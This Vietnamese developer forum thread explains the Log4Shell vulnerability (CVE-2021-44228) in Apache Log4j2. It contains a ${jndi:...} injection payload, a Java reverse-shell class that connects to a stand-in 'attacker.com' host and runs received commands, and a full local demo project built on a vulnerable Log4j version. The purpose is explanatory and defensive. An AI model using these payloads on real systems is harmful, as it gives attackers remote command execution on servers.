Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In
Continue with Google
Continue with Facebook
or use


Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here
Continue with Google
Continue with Facebook
or use


Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.


Have an account? Sign In Now

Sorry, you do not have a permission to ask a question, You must login to ask question.

Continue with Google
Continue with Facebook
or use


Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

Stack Ask

Stack Ask Logo Stack Ask Logo

Stack Ask Navigation

  • Home
  • About Us
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • About Us
  • Contact Us
Home/ Questions/Q 3700
Next
In Process
monkey
  • 2
monkeyEnlightened
Asked: December 13, 20212021-12-13T11:09:36+00:00 2021-12-13T11:09:36+00:00In: Java

Hiểu rõ về lỗ hổng của Apache Log4j2 (CVE-2021-44228)

  • 2

Hiểu rõ về lỗ hổng của Apache Log4j2 (CVE-2021-44228)

Để hiểu rõ hơn chúng ta phải hiểu về log4j một chút. Log4j sử dụng chain of responsibility design pattern, thế nên ở bên trong nó sẽ có các Appender. Khi một dòng log kiểu logger.info("Hello: {}", param) thì đoạn log này sẽ chạy qua tất cả các appender thể thực hiện các công việc tương ứng, ví dụ in ra màn hình, ghi vào file, và trong đó có 1 lớp tên là: RoutingAppender. Lớp này sẽ gọi đến hàm StrSubstitutor.resolveVariable. Hàm này sẽ đi lấy giá trị của biến, và đau lòng thay, nó gọi lại đến lớp Interpolator.

Lớp Interpolator sẽ tìm kiếm qua nhiều giao thức, trong đó có giao thức JNDI để lấy ra giá trị của biến, và thế là bùm. Kẻ tấn công sẽ tạo ra 1 lớp thế này:

public class Log4jShell {
    static {
        try {
            Socket socket = new Socket("attacker.com", 1234);
            Scanner scanner = new Scanner(socket.getInputStream());
            while(true) {
                String command = scanner.nextLine();
                ProcessBuilder pb = new ProcessBuilder(command);
                pb.start();
            }
        } catch (Exception e) {}
    }
}

Và hắn thông quan tham số name truyền lên server kiểu: https://web_site_cua_chung_ta/hello?name=${jndi://web_site_cua_ke_tan_cong.com/Log4jShell.class}, và cùng với câu lệnh logger ở trên. Lớp Interpolator sẽ lấy giá trị của biến bằng cách lấy lớp Log4jShell.class về, và thế là toang, kẻ tấn công sẽ có hẳn 1 cái terminal xịn sò trên server của chúng ta và muốn làm gì thì làm.

Nhược điểm của lỗ hổng lần này là nó làm cho cả thế giới tán loạn. Phải đi release lại toàn bộ các sản phẩm đang dùng 2.0 <= log4j-core <= 2.14.1.

Còn ưu điểm là nó cũng cho thấy được Java nó phổ biến và được sử dụng rộng rãi đến mức nào. Thế nên anh em cứ tự tin khi lựa chọn Java để làm ngôn ngữ lập trình backend cho mình và cho tổ chức của mình nhé.

Tham khảo thêm nếu anh em cần nhé: https://www.lunasec.io/docs/blog/log4j-zero-day/#how-you-can-prevent-future-attacks

log4j-coresecurity
  • 3 3 Answers
  • 593 Views
  • 0 Followers
  • 0
Answer
Share
  • Facebook
  • Report

3 Answers

  • Voted
  • Oldest
  • Recent
  1. monkey Enlightened
    2021-12-14T10:18:24+00:00Added an answer on December 14, 2021 at 10:18 am
    This answer was edited.

    Demo không sử dụng qua LDAP:

    package com.example.log4jshell;
    
    import javax.naming.Context;
    
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    
    import com.tvd12.ezyhttp.core.boot.EzyHttpApplicationBootstrap;
    
    public final class Log4jShellStartup {
    
        private static final Logger LOGGER = LogManager.getLogger(Log4jShellStartup.class);
    
        public static void main(String[] args) throws Exception {
            LOGGER.info("start Log4jShell");
            System.setProperty(Context.INITIAL_CONTEXT_FACTORY, "com.example.log4jshell.AppContextFactory");
            System.setProperty(Context.PROVIDER_URL, "remote+http://localhost:8080");
            EzyHttpApplicationBootstrap.start(Log4jShellStartup.class);
        }
    }
    
    package com.example.log4jshell;
    
    import java.util.Hashtable;
    
    import javax.naming.Context;
    import javax.naming.NamingException;
    import javax.naming.spi.InitialContextFactory;
    
    public class AppContextFactory implements InitialContextFactory {
    
        private final AppInitialContext context = new AppInitialContext();
    
        public AppContextFactory() throws NamingException {}
    
        @Override
        public Context getInitialContext(Hashtable environment) throws NamingException {
            return context;
        }
    }
    
    package com.example.log4jshell;
    
    import java.io.File;
    import java.util.Hashtable;
    
    import javax.naming.NamingException;
    import javax.naming.ldap.InitialLdapContext;
    
    import com.tvd12.ezyhttp.client.HttpClient;
    
    public class AppInitialContext extends InitialLdapContext {
    
        private final HttpClient httpClient;
    
        public AppInitialContext() throws NamingException {
            httpClient = HttpClient.builder().build();
        }
        @Override
        protected void init(Hashtable environment) throws NamingException { }
    
        @Override
        public Object lookup(String name) throws NamingException {
            try {
                httpClient.download(name, new File("target/classes"));
                Thread.sleep(300);
                Class clazz = Class.forName("Log4jShell");
                return clazz.newInstance();
            } catch (Exception e) {
                e.printStackTrace();
            }
            return null;
        }
    }
    
    package com.example.log4jshell.controller;
    
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    
    import com.tvd12.ezyhttp.server.core.annotation.Controller;
    import com.tvd12.ezyhttp.server.core.annotation.DoGet;
    import com.tvd12.ezyhttp.server.core.annotation.RequestParam;
    
    @Controller
    public class HomeController {
    
        private final Logger logger = LogManager.getLogger(getClass());
    
        @DoGet("/hello")
        public String hello(@RequestParam String name) {
            logger.info("Hello: {}", name);
            return "Hello " + name;
        }
    }
    
    • 0
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report
  2. monkey Enlightened
    2021-12-14T10:29:13+00:00Added an answer on December 14, 2021 at 10:29 am
    This answer was edited.

    Demo không sử dụng qua LDAP (tiếp):

    import java.net.Socket;
    import java.util.Scanner;
    
    public class Log4jShell {
        static {
            try {
                System.out.println("Shell started");
                Socket socket = new Socket("localhost", 3006);
                Scanner scanner = new Scanner(socket.getInputStream());
                while(true) {
                    String command = scanner.nextLine();
                    ProcessBuilder pb = new ProcessBuilder(command);
                    pb.start();
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    

    Chạy lệnh javac Log4jShell.java để tạo ra file Log4jShell.class

    • 0
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report
  3. monkey Enlightened
    2021-12-14T11:06:30+00:00Added an answer on December 14, 2021 at 11:06 am

    Demo không sử dụng qua LDAP (tiếp):

    Cấu trúc thư mục dự án sẽ kiểu:

    File application.properties:

    resources.enable=true
    

    File log4j2.xml:

    <?xml version="1.0" encoding="UTF-8"?>
    <Configuration status="INFO">
      <Appenders>
        <Console name="LogToConsole" target="SYSTEM_OUT">
          <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
        </Console>
      </Appenders>
      <Loggers>
        <Logger name="com.example" level="debug" additivity="false">
          <AppenderRef ref="LogToConsole"/>
        </Logger>
        <Root level="info">
          <AppenderRef ref="LogToConsole"/>
        </Root>
      </Loggers>
    </Configuration>
    

    File pom.xml

    <?xml version="1.0" encoding="UTF-8"?>
    <project xmlns="http://maven.apache.org/POM/4.0.0"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
      <parent>
        <groupId>com.tvd12</groupId>
        <artifactId>ezyfox</artifactId>
        <version>1.0.2</version>
      </parent>
      <modelVersion>4.0.0</modelVersion>
      <artifactId>log4jshell</artifactId>
    
      <properties>
        <log4j2.version>2.11.2</log4j2.version>
        <ezy.http.version>0.2.0</ezy.http.version>
      </properties>
    
      <dependencies>
        <dependency>
          <groupId>com.tvd12</groupId>
          <artifactId>ezyhttp-server-boot</artifactId>
          <version>${ezy.http.version}</version>
        </dependency>
        <dependency>
          <groupId>com.tvd12</groupId>
          <artifactId>ezyhttp-client</artifactId>
          <version>${ezy.http.version}</version>
        </dependency>
        <dependency>
          <groupId>org.apache.logging.log4j</groupId>
          <artifactId>log4j-api</artifactId>
          <version>${log4j2.version}</version>
        </dependency>
        <dependency>
          <groupId>org.apache.logging.log4j</groupId>
          <artifactId>log4j-core</artifactId>
          <version>${log4j2.version}</version>
        </dependency>
      </dependencies>
    </project>
    
    • 0
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

You must login to add an answer.

Continue with Google
Continue with Facebook
or use


Forgot Password?

Need An Account, Sign Up Here

Sidebar

Ask A Question

Stats

  • Questions 826
  • Answers 1k
  • Best Answers 80
  • Users 337
  • Popular
  • Answers
  • monkey

    [Deep Learning] Làm thế nào để xác định được cái ...

    • 16 Answers
  • Thành Vương

    Bug sai đường dẫn khi config ckeditor lên live

    • 14 Answers
  • Tú Trần Anh

    [Ezyfox Server] Unity game client không gửi được command khi ...

    • 12 Answers
  • tvd12
    tvd12 added an answer 1. Anh không hiểu tại sao em lại cần phải… February 4, 2023 at 7:50 am
  • tvd12
    tvd12 added an answer Cái này anh thấy là em đang gửi dữ liệu… February 4, 2023 at 7:46 am
  • monkey
    monkey added an answer Đây em: class Event{} class Room{} class EventRoom{eventId, roomId} February 2, 2023 at 9:07 am

Related Questions

  • Thân Nam

    Không submit được File trên postman

    • 1 Answer
  • Hồng Quân Nguyễn

    Synchronous Redis trong Spring boot

    • 1 Answer
  • Hồng Quân Nguyễn

    kafka serializer và deserializer

    • 3 Answers

Top Members

tvd12

tvd12

  • 76 Questions
  • 1k Points
Enlightened
monkey

monkey

  • 122 Questions
  • 1k Points
Enlightened
Nguyễn Thái Sơn

Nguyễn Thái Sơn

  • 205 Questions
  • 307 Points
Enlightened

Trending Tags

#formatdate .net .net core .net oop abstract class access app access token ai analytics android ansible anti-flooding apache poi api app architecture artificial intelligence assembly async asyncawait atomicboolean authentication backend backend nestjs background bash script batch bean big project binding bitcoin blockchain blog boot-nodes branch british btree bucket4j buffered build bundle c# c# .net cache caching callback career career path cast centos chat cloud cloud reliability commit communication company computer science concurrent config-css connection pool content-disposition contract convert date to number cookie cors cosmos cosmos-sdk crawl data cron css database database migration datasource datastructure deadlock decentralized exchange deep learning deploy contract design-pattern design patterns devops dex di distraction programing dns docker download draw.io du học duration dữ liệu lớn eclip editor elasticsearch email employee english erc20 erc721 estimation eth ethereum ethereum login excel exception exception handle exception handler executor export compliance extensions exyfox ezyfox ezyfox-boot ezyfox-server ezyfoxserver ezyhttp ezymq-kafka ezyredis facebook fe filter floating point flutter format json freetank french front-end frontend fullstack fulltextsearch future gallery game game-box game-room game-server gateway get get file zip git glide go golang google gorilla graduation thesis graphql grapql grpc guide h2 database handy terminal hazelcast hibernate hibernateconfig html http https hyperloglog image index indexing integration-test intellij interface interview io ioc ipfs isolate issue it java java core javacore javascript java spring javaw java web jenkins jetbrains job join jotform jpa js json json file jsonproperty json to object jsp jsp & servlet junit-test jvm jwt kafka keep promise kerberos keycloak kotlin language languague library list load-balancing load balancer lock log log4j log4j-core login lưu trữ machine learning macos mail mail template main maria db math maven merge message queue messaging metamask microservice microservices migration mobile model mongo monitoring mq msgpack multi-threading multiple tenant multithread multithreading mysql n naming naming convention nan netcore netty networking nft nft game nginx nio node.js nodejs non-blocking io null oop opensource optimize oracle orm otp message paginaiton pagination pancakeswap panic partition pdf pgpool phỏng vấn plugin pointer postgresql postman pre private_key procedure profile programming project management promise properties push-noti push message android push notification python python unicode qrcode question queue rabbitmq reactive reactjs reactjs download readmoretextview recyclerview redis refactor refresh token regex replica repository request resilence4j resource rest resttemplate roadmap ropssten ropsten round robin rust rxjava s3 schedule scheduled scheduled spring boot search security send email send mail server servlet session shift jis singleton sjis slack smart contract soap socket socket server soft delete solution sosanh spring spring-boot-test spring-jpa spring aop springboot spring boot spring data jpa spring redis springsecurity spring security springwebflux mysql spring websocket spring websocket cors sql sql server sse ssl email stackask storage stream stream api stress test structure trong spring boot study synchronize synchronized system environment variables test thread threadjava threadpool thread pool thymeleaf tomcat totp tracking location transaction transfer transfer git udp uniswap unit test unity upload upload file utf-8 file validate validate date vector view volatile vue vue cli watermark web web3 web3 client webassembly webflux webpack websocket windows 11 winforms work zip file zookeeper

Footer

Stack Ask

Stack Ask is where Developers Ask & Answers. It will help you resolve any questions and connect you with other people.

About Us

  • Meet The Team
  • About Us
  • Contact Us

Legal Stuff

  • Terms of Service
  • Privacy Policy
  • Cookie Policy

Help

Follow

© 2021 Stack Ask. All Rights Reserved
Powered by youngmonkeys.org